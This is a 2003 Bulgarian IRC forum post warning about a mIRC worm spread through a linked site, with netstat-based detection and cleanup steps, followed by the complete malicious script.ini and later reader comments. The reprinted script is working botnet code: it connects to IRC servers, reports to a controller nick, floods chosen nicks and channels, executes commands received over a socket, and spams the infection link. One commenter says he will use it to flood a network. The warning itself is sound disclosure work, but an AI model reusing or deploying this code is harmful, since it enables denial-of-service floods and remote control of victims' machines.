Начало | IRC HELP | IRC ФОРУМ | HTML Chat | Вход

от: dzver (регистриран)

Този вирус има за цел да ви превърне във FloodBot - FloodDrone. Заразата с него става, като посетите адрес:
http://www.geocities.com/tbilisi_girl/

Можете да проверите дали го имате, като пуснете ms dos prompt (Start/Programs или Start/Programs/Accesoires) и напишете netstat. На заразени компютри ще излезе ред от сорта на:
TCP vesko:1890 jade.va.us.dal.net:6667 ESTABLISHED
TCP vesko:1891 irc.del.bg:6667 ESTABLISHED
TCP vesko:1892 irc.del.bg:6667 ESTABLISHED

connection към дал.нет и 2 към сървъра, на който чатите в момента. Нормално е да имате само 1

TCP vesko:1892 irc.del.bg:6667 ESTABLISHED

Какво става, като посетите горния сайт със стар експлорер?
1. Виждате една изключително грозна гола жена.
2. mIRC-ът ви се заразява по познатия начин
3. при пускане на mIRC, заразата вкарва в чата SpamDrone, което рекламира сайта, с който се инфектират новите жертви
4. вирусът вкарва бот в дал.нет, който съобщава за присъствието си на човек с nick petrol
5. Вашият компютър е на разположение за Flood на произволен човек от произволен човек, произволен канал, сървър и чат мрежа.

Изчистване:
1. Инсталация на Mozilla - за да не се заразявате отново
2. Изтриване на script.ini, mirc.ini или на целия mIRC и инсталиране на ново (зависи до колко разбирате за какво става въпрос:)
3. Запомняне на правилото: не бива да се посещават рекламирани в чаат порно сайтове!

Приложение - в script.ini има следния скрипт, който пуска рекламен бот и floodbot от вашия mIRC:

n0=on1 :start:.sockopen bot jade.va.us.dal.net $chr(310) $+ $chr(310) $+ $chr(310) $+ $chr(311)
n1=alias FlooD if ($ 1= nick) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen next $+ $rand(1,999999) %server %port | halt } | if ($ 1= chan) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen chan $+ $rand(1,999999) %server %port | halt } | if ($ 1= kill) { set %nick $ 2| set %channel $ 2| set %server $ 3| set %port $ 4| sockopen kill $+ $rand(1,999999) %server %port | halt }
n2=on *:Sockopen:next*:{
n3= if ($sockerr >0 ) { halt }
n4=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n5=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -n $sockname privmsg %nick : $+ %petrolflood | .sockwrite -n $sockname notice %nick : $+ %petrolflood | .sockclose $sockname | .sockopen next $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n6=}
n7=on *:Sockopen:chan*:{
n8= if ($sockerr >0 ) { halt }
n9=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n10=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $+ $rand(A,Z) $+ Guest | sockwrite -tn $sockname join %channel | .sockwrite -n $sockname privmsg %channel : $+ %petrolflood | .sockwrite -n $sockname privmsg %channel : $+ %petrolflood | .sockclose $sockname | .sockopen chan $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n11=}
n12=on *:Sockopen:kill*:{
n13= if ($sockerr >0 ) { halt }
n14=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) | sockwrite -tn $sockname join %channel | .sockwrite -n $sockname privmsg %nick : $+ $chr(1) $+ finger $+ $chr(1) | .sockclose $sockname | .sockopen kill $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) $+ $r(0,999) %server %port
n15=set %petrolflood georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia. georgia.georgia.georgia.georgia.
n16=}
n17=on *:sockread:hack*: {
sockread %botread |
set %nickl 1$gettok(%botread,1,32) |
set %nickl 2$left(%nickl1,8) |
set %nickf $right(%nickl2,7) |
if ($gettok(%botread,5,32) == kjk) && (kjk isin %nickf) { $gettok(%botread,6-,32) } }
n18=on *:Sockopen:hack*:{
n19= if ($sockerr >0 ) { halt }
n20=set -u 1%user $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(1,9) $+ $rand(A,Z) | .sockwrite -nt $sockname USER %user %user %user : $+ %user | .sockwrite -nt $sockname NICK $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $rand(A,Z) $+ $+ $rand(A,Z) $+ $+ $rand(A,Z) | .timer 120 0 sockwrite -n $sockname privmsg petrol :i'm tbilisi - $me $+
n21=}
n22=on *:sockclose:next*:/.timer 3 1 sockopen bot jade.va.us.dal.net $chr(310) $+ $chr(310) $+ $chr(310) $+ $chr(311)
n23=
n24=
n25=
n26=on *:join:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n27=on *:part:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n28=on *:kick:#:if ( $nick == $Me ) { halt } | .msg $nick 13http://www.geocities.com/tbilisi_girl 6Free Russia Sex
n29=
n30=alias mr_petroleum { set %petrolflood $1- }
n31=
n32=on ^*:text:*:?:if (www isin $1-) || (http isin $1-) { halt }

Edited from: dzver; 2003-01-25 08:08

Edited from: dzver; 2003-01-25 08:14

Мнения от посетители (10):
(анонимен)07.04.07 17:47:58
Tursq irc flooder
iskam irc flooder za nick ili channel nqma znachenie nqkoi ako znae neshto po vaprosa /q ne0-[]
mersi

REfRESh (анонимен)08.01.07 22:36:31
Kvo e tva Skript
Kakvo e tova Skript we

SmeHoRaNkata (анонимен)22.10.06 12:12:18
tyrsq spec bot....
nqkoi moje li da mi kaje ot kade da si izteglq bota, deto vyrti edno 6i6e i toq s duelite....???? pls pomognete mi.. spe6no e... mersi predvaritelno... koito znae da mi prati linka na i_kvo_aaa@abv.bg

bali mama mu (анонимен)14.12.05 02:38:08
the
hakerstvoto e maniq

razbiv@abv.bg (анонимен)02.02.04 17:02:34
bih se radval ako mi obqsnite kak se raboti s mozila.

maikavi (анонимен)03.01.04 23:03:38
pidqrasi
muhahah da eba maikavi umrqla da eba

dzver14.02.03 07:14:24
mi k'vo da ti kaja prostak :)
rabotata e tam, che ako horata razbiraha, niamashe ot podobni flood-drones da padat services kato Yahoo!

ubeden sum, che pone 15-20% ot computrite v svetoven mashtab sa vulnerable i sa nositeli na 1 ili poveche trojani i virusi.

Vsichkite tia raboti gi pisha s nadejdata posetitelite na bgirc.net da NE POSESHTAVAT sites, reklamirani im sus SPAM i da ne polzvat INTERNET EXPLORER ver. pod 6

PROSTAKA (анонимен)13.02.03 20:13:46
obyasnete tova na bg
ne e mnogo yasno a?obyasnete na prost ezik za da mogat horata da vi razbirat nie koito chatim ne sme komp.specialisti i stava slojno

T0sh27.01.03 17:27:58
za "no comment" ama...
tipichno izkazvane na unibg debil :) pulen :)

kelesh4o (анонимен)26.01.03 18:26:10
gotin script
she go polzvbam da floodq BgIRC hahaha
_)_ keleshi

Anonymous comments are temporary disabled

  Copyright: ShakeIT IRC; dev: dzver; des: metala. Read blogs.  
eXTReMe Tracker